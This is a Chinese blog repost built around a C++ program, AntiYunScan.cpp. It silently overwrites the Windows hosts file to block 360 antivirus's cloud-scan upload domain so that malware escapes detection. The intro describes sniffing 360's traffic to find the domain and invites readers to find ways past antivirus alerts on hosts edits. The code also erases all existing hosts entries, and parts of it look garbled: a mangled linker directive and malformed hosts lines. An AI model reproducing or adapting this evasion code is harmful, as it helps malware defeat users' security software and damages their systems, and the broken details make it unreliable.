”host域名劫持反360云查杀

【白银时代】备注：同样的是讨论360的云安全的，这是通过屏蔽云查杀的域名地址来躲避。但是后台修改HOST文件的话很多杀毒软件都会报毒，这个是个麻烦，得大家自己去想想如果绕过了……

来源：http://hi.baidu.com/whmtorrent/blog/item/7a9227fbc4953316a8d311ab.html
【相关文章】[过360云查杀vc++代码]

通过host域名劫持来反360云查杀的代码

用WSockExpert捕获360云查杀上传文件时候的数据包

用修改host文件的方法把qup.f.360.cn这个域名屏蔽掉就达到了反云查杀的目的

//***************************************  AntiYunScan.cpp************************************************

//By:洪流
#pragma comment(linker, “/OPT:NOWIN98″)
#pragma comment(linker, “/align:0×200″)
#pragma comment(linker, “/subsystem:windows”)
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,”MSVCRT.lib”)
#pragma comment(linker,”/ENTRY:Torrent /FILEALIGN:0×200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078″)

int AntiYunScan()
{
char host[MAX_PATH];
GetSystemDirectory(host,MAX_PATH);   //得到host目录,免疫杀毒软件
strcat(host,”\\drivers\\etc\\hosts“);
SetFileAttributes(host,FILE_ATTRIBUTE_NORMAL);
FILE *file;
file=fopen(host,”w”);//以写入的方式打开文件，”w”–write
char mianyi[MAX_PATH]=
“www.llsilver.com localhost\r\n”
“www.llsilver.com qup.f.360.cn\r\n”;
fputs(mianyi,file);
fclose(file);//关闭文件
return 0;
}

void Torrent()
{
AntiYunScan();
ExitProcess(0);
}

//***************************************************************************************